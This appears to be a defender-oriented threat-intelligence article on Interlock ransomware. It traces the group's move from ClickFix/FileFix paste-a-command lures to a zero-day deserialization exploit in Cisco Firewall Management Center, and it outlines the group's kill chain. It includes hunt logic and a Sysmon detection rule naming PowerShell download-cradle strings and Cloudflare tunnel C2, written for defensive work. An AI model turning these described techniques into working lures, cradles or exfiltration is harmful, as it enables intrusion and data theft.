For about a year, the most reliable way to get hit by Interlock ransomware was to paste a command into your own Run dialog because a fake CAPTCHA told you to. The group built an entire intrusion practice on that single moment of misplaced trust β€” a compromised website, a “verify you are human” prompt, a one-liner the victim copied and ran by hand. It worked well enough to put Interlock on a joint CISA–FBI advisory by July 2025.

Then, on January 26, 2026, Interlock stopped waiting for anyone to make a mistake.

That is the date Amazon’s MadPot honeypot network first recorded exploitation of CVE-2026-20131, an unauthenticated, root-level remote code execution flaw in Cisco Secure Firewall Management Center. The bug carried a CVSS of 10.0. Cisco would not disclose it for another 36 days. For more than a month, the same crew that had been tricking receptionists into pasting PowerShell was instead deserializing malicious Java objects straight into the root context of the appliance that governs an organization’s entire firewall fleet.

This is the part of the Interlock story worth your attention. Not that a ransomware group exists β€” there are dozens β€” but that a single group now operates fluently at both ends of the sophistication ladder, and treats social engineering and pre-auth zero-day exploitation as interchangeable means to the same end. If your threat model still files “user got phished” and “perimeter appliance got popped” as separate problems with separate owners, Interlock has already invalidated it.

A Group That Refuses to Stand Still

Interlock was first observed in late September 2024. By the time CISA, the FBI, HHS, and MS-ISAC published joint advisory AA25-203A in July 2025, the group had compiled a track record against businesses, healthcare providers, and critical infrastructure across North America and Europe. It runs a double-extortion model: exfiltrate first, encrypt second, then threaten to leak whatever was stolen if the ransom goes unpaid. The encryptors exist for both Windows and Linux and are built to encrypt virtual machines on both, using AES for bulk data and RSA to wrap the keys. Encrypted files get a .interlock or .1nt3rlock extension, and victims find a !__README__!.txt ransom note waiting for them.

None of that is novel. What makes Interlock worth a full anatomy is the trajectory. Most ransomware crews find a delivery mechanism that works and ride it into the ground. Interlock keeps re-tooling β€” and the 14 months between its first sighting and the Cisco campaign trace a clean line from opportunistic social engineering to deliberate, capital-intensive zero-day operations.

Act One: Tricking the Human (2024–2025)

Interlock’s early access game was built on the web. Starting around May 2025, its activity was tied to the LandUpdate808 web-inject cluster β€” better known as KongTuke β€” which compromises legitimate websites and injects a single line of script into the page HTML, usually without the site owner ever noticing. Visitors to those poisoned pages got served a lure.

The lure was ClickFix. A victim sees a fake CAPTCHA or a “fix this browser error” prompt and is walked through opening the Windows Run dialog, pasting a supplied command, and pressing Enter. The command is a PowerShell download cradle that pulls the next stage. The social engineering is the entire exploit; there is no memory corruption, no patch that fixes it, nothing for a scanner to flag. The user is the vulnerability.

By mid-2025 the group iterated on the technique itself. The FileFix variant β€” documented by Arctic Wolf and The DFIR Report β€” swaps the Run dialog for the File Explorer address bar, which most users have never been told to distrust and which many application-control policies do not cover. Same outcome, wider blast radius.

The payload evolved in parallel. The original Interlock RAT, tracked as NodeSnake, was a custom, modular JavaScript implant with no relationship to any public codebase β€” file transfer, process injection and hollowing, credential theft via custom and commodity stealers, screenshot capture. In July 2025 researchers documented a PHP-based rewrite of the RAT delivered through FileFix. The move to PHP was a deliberate evasion play: a portable interpreter that runs almost anywhere, sidesteps detection tuned for classic Windows executables, and is far faster to modify than a Node.js application. Command and control ran through Cloudflare Tunnel (trycloudflare.com), which gives the operators a free, TLS-wrapped, reputable-looking channel that blends into traffic no one blocks.

This is a competent, evolving social-engineering operation. It is also fundamentally rate-limited by human behavior. Someone has to fall for the prompt. That ceiling is exactly what Act Two removes.

Act Two: Owning the Appliance (2026)

CVE-2026-20131 lives in the web-based management interface of Cisco Secure Firewall Management Center. The root cause is insecure deserialization of a user-supplied Java byte stream: the interface accepts serialized Java objects and feeds them into object handling without sufficient validation. An unauthenticated remote attacker sends a crafted serialized object to the management interface, triggers arbitrary Java code execution, and lands as root. No credentials. No user interaction. No CAPTCHA to paste.

Amazon’s threat intelligence team reconstructed the exploit flow from MadPot sensor data after Cisco’s disclosure. The malicious requests hit a specific path in the FMC software, and the request bodies carried Java code-execution attempts plus two embedded URLs β€” one to deliver configuration data supporting the exploit, and a second to confirm success by forcing the vulnerable target to perform an outbound HTTP PUT and upload a file the attacker generated. That HTTP PUT is the cleanest forensic tell in the whole chain, and we will come back to it.

Cisco disclosed CVE-2026-20131 on March 4, 2026, alongside a second maximum-severity FMC bug, CVE-2026-20079, and shipped fixed software β€” the only remediation is upgrading to version 7.4.2.1 or later. CISA added CVE-2026-20131 to the Known Exploited Vulnerabilities catalog on March 19. By then Interlock had been inside the window for nearly two months.

The deserialization bug class is the unglamorous, undefeated champion of appliance compromise. We have watched the same primitive β€” untrusted serialized data hitting a Java or Python sink β€” turn up in management planes, inference servers, and middleware for two decades. The lesson Interlock is teaching is not that deserialization is dangerous; everyone knows that. It is that a ransomware affiliate now has the capability, or the budget, to weaponize a fresh one against a Tier-1 vendor’s flagship security appliance and sit on it as a zero-day.

Why Firewall Management Center Is the Worst Possible Thing to Lose

It is tempting to file this under “another edge device CVE.” It is worse than that, and the difference matters for how you prioritize the patch.

A firewall is one enforcement point. The Firewall Management Center is the brain that programs every firewall it manages β€” the policy plane, the place where rules, objects, NAT, VPN configuration, and access control for an entire fleet are authored and pushed. Compromising one firewall gets an attacker through one door. Compromising FMC as root gets them authorship of the doors. They can push policy, open paths, disable inspection, harvest the configuration of the whole estate, and do it from the one box your network implicitly trusts to reconfigure security controls.

This is the same structural lesson the Kubernetes controller-token and OAuth-pivot stories taught in different clothing: the management plane is a more valuable target than anything it manages, and it is routinely protected as if it were just another host. An attacker who owns FMC does not need to move laterally in the usual sense. The appliance’s legitimate function is lateral movement. That is why a management-plane RCE deserves emergency-change-window treatment, not next-Tuesday triage β€” and why so many shops got the priority wrong.

The Kill Chain, End to End

Whichever door Interlock comes through β€” pasted PowerShell or a deserialized Java object β€” the post-access playbook converges. AA25-203A and subsequent vendor reporting describe a consistent chain:

  • Foothold and tooling. Drop a remote access tool and a beacon. Interlock has leaned on Cobalt Strike, AnyDesk, PuTTY, and RMM software including ScreenConnect β€” which is precisely why Cisco’s mitigation guidance for the FMC bug tells operators to audit for unauthorized ScreenConnect installations. An unexpected RMM agent on a security appliance is not a footnote; it is the intrusion.
  • Persistence. A scheduled task named TaskSystem (ATT&CK T1053.005), registry Run keys, or .lnk shortcuts dropped into the Startup folder (T1547.001). Valid stolen accounts (T1078) keep VPN and RDP access alive even if the malware is cleaned up.
  • Credential access. Custom stealers alongside commodity ones β€” Lumma and Berserk β€” to harvest browser secrets, tokens, and domain credentials.
  • Discovery and lateral movement. Hands-on-keyboard reconnaissance, then movement across the estate using the credentials and trust the appliance hands them for free.
  • Exfiltration. AzCopy pushing stolen data to attacker-controlled Azure storage blobs. Outbound traffic to a major cloud provider’s storage endpoints is exactly the kind of thing that looks legitimate in a NetFlow review, which is the point.
  • Impact. AES+RSA encryption across Windows and Linux hosts and their VMs, .interlock extension, !__README__!.txt note, leak-site countdown.

The chain is unremarkable once you are inside. That is the uncomfortable part β€” the sophistication is entirely front-loaded into initial access, and everything after the front door is well-trodden tradecraft your EDR has seen a hundred times. If you are catching Interlock at the encryption stage, you missed it five steps earlier.

The 36-Day Head Start

Lay the timeline out and the structural problem is obvious:

  • January 26, 2026 β€” first in-the-wild exploitation of CVE-2026-20131 (MadPot).
  • March 4, 2026 β€” Cisco discloses and patches; FMC 7.4.2.1 ships.
  • March 19, 2026 β€” CISA adds the CVE to the KEV catalog.

For 36 days the vulnerability existed only in the attacker’s hands. Defenders could not patch what they did not know about, could not write detections for an undisclosed bug, and could not hunt for IOCs that had not been published. The only controls that mattered during that window were the ones already in place before anyone knew the CVE existed: whether the FMC management interface was reachable from the internet, whether management traffic was segmented, whether anomalous outbound connections from a security appliance would have tripped anything.

This is the dwell-time problem inverted. We usually talk about dwell time as how long an attacker sits undetected after breaking in. The zero-day window is dwell time before the defensive community even knows the door exists β€” and for a pre-auth, root-level bug on an internet-exposed management plane, 36 days is more than enough to ransom everyone who left the interface facing the internet. The patch, when it landed, was a deadline for the attacker, not a save for the victim.

What This Means for Detection

You cannot retro-detect a zero-day in real time, but the FMC exploit leaves artifacts, and Interlock’s post-access behavior is noisy if you are looking. Concrete, defensible hunts:

On Firewall Management Center. Hunt logs retroactively from January 26, 2026 forward. The highest-value signals:

1
2
3
4
5
6
7
8
9

# Conceptual hunt logic for CVE-2026-20131 exploitation
1. HTTP PUT requests ORIGINATING FROM the FMC appliance to unknown
   external hosts  -> the confirmation/exfil mechanism. Highest fidelity.
2. Java deserialization errors / stack traces in FMC application
   (Tomcat/catalina) logs around unauthenticated requests.
3. Unauthenticated HTTP requests to the management web interface,
   especially from outside your management network.
4. New/unexpected RMM agents (ScreenConnect) or outbound AnyDesk traffic
   from the appliance or adjacent management hosts.

An FMC appliance has no legitimate reason to initiate an outbound HTTP PUT to an unfamiliar host. That single behavior is worth a high-severity alert on its own.

For the ClickFix/FileFix vector. The richest artifact is the Run dialog itself. Windows records what users type into Run under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU β€” a near-perfect forensic record of a ClickFix paste. Pair that with process telemetry:

1
2
3
4
5

# Sysmon EID 1 β€” PowerShell spawned from a shell context with a download cradle
ParentImage  ends with \explorer.exe
Image        ends with \powershell.exe (or \mshta.exe, \cmd.exe)
CommandLine  contains any of: -enc, -e , IEX, Invoke-WebRequest, iwr,
             curl, DownloadString, FromBase64String, trycloudflare.com

explorer.exe spawning an encoded PowerShell download cradle is not something benign users do. For FileFix specifically, watch for processes launched with a parent context of File Explorer where the command line is a network fetch. And inventory C2 egress: connections to trycloudflare.com subdomains from servers that have no business using ad-hoc Cloudflare tunnels deserve a look.

For the authoritative IOC and ATT&CK mapping β€” file hashes, infrastructure, the full technique table β€” go to CISA AA25-203A and the Cisco advisory rather than trusting any single blog’s reproduction, including this one.

What Defenders Should Do This Week

Skip the abstractions. If you run Cisco Secure Firewall Management Center, or you have users with Windows endpoints, here is the list:

  1. Patch FMC to 7.4.2.1 or later, now, if you have not. CVE-2026-20131 is on the KEV; it is being exploited by a ransomware crew that had a 36-day head start. There is no configuration workaround β€” only the upgrade.
  2. Get management interfaces off the internet. FMC, and every appliance management plane, belongs on a segmented management network reachable only through a bastion or VPN with MFA. The single biggest factor in whether the 36-day window hurt you was internet exposure of the management interface. This is the control that would have saved you before the CVE had a number.
  3. Run the retroactive hunt from January 26, 2026. Patching closes the door; it tells you nothing about whether someone already walked through. Pull FMC logs and look for the outbound HTTP PUT and Java deserialization errors. Treat any unexplained outbound connection from the appliance as compromise until proven otherwise.
  4. Audit security appliances for RMM and remote-access tooling. Unauthorized ScreenConnect, AnyDesk, or similar on or near FMC is a post-exploitation indicator, not a misconfiguration.
  5. Make ClickFix a named detection, not a security-awareness slide. Alert on explorer.exe-parented PowerShell download cradles and monitor RunMRU. Awareness training has a known failure rate; the telemetry does not get tired.
  6. Constrain the egress your appliances and servers are allowed. AzCopy to unfamiliar Azure blobs and tunnels to trycloudflare.com are exfiltration and C2 hiding in reputable traffic. Default-deny outbound from infrastructure that has no reason to talk to arbitrary cloud endpoints turns both into alerts.

The Uncomfortable Lesson

The reason Interlock deserves a full anatomy is not its encryptor or its leak site. It is that one group now runs the entire spectrum of initial access β€” from a fake CAPTCHA that costs nothing to a CVSS 10.0 zero-day against a Tier-1 firewall vendor β€” and moves between them as the opportunity dictates. The same operators who will trick your front desk into pasting PowerShell on Monday will deserialize a Java object into the root of your firewall manager on Tuesday.

Most security programs are still organized around the assumption that these are different adversaries with different budgets and different targets. Phishing is the awareness team’s problem; appliance CVEs are the infrastructure team’s problem; ransomware is the IR team’s problem. Interlock is a single adversary that has made all three the same problem. Initial access is now polymorphic, and the entry vector tells you almost nothing about the sophistication of who is on the other end of it.

So plan for the convergence. Assume the crew that phishes you can also burn a zero-day, and that the appliance you trust to enforce policy is exactly the thing they want to own. Get the management planes off the internet, instrument them like the high-value targets they are, and stop treating the front door and the firewall’s brain as separate threat models. Interlock already stopped.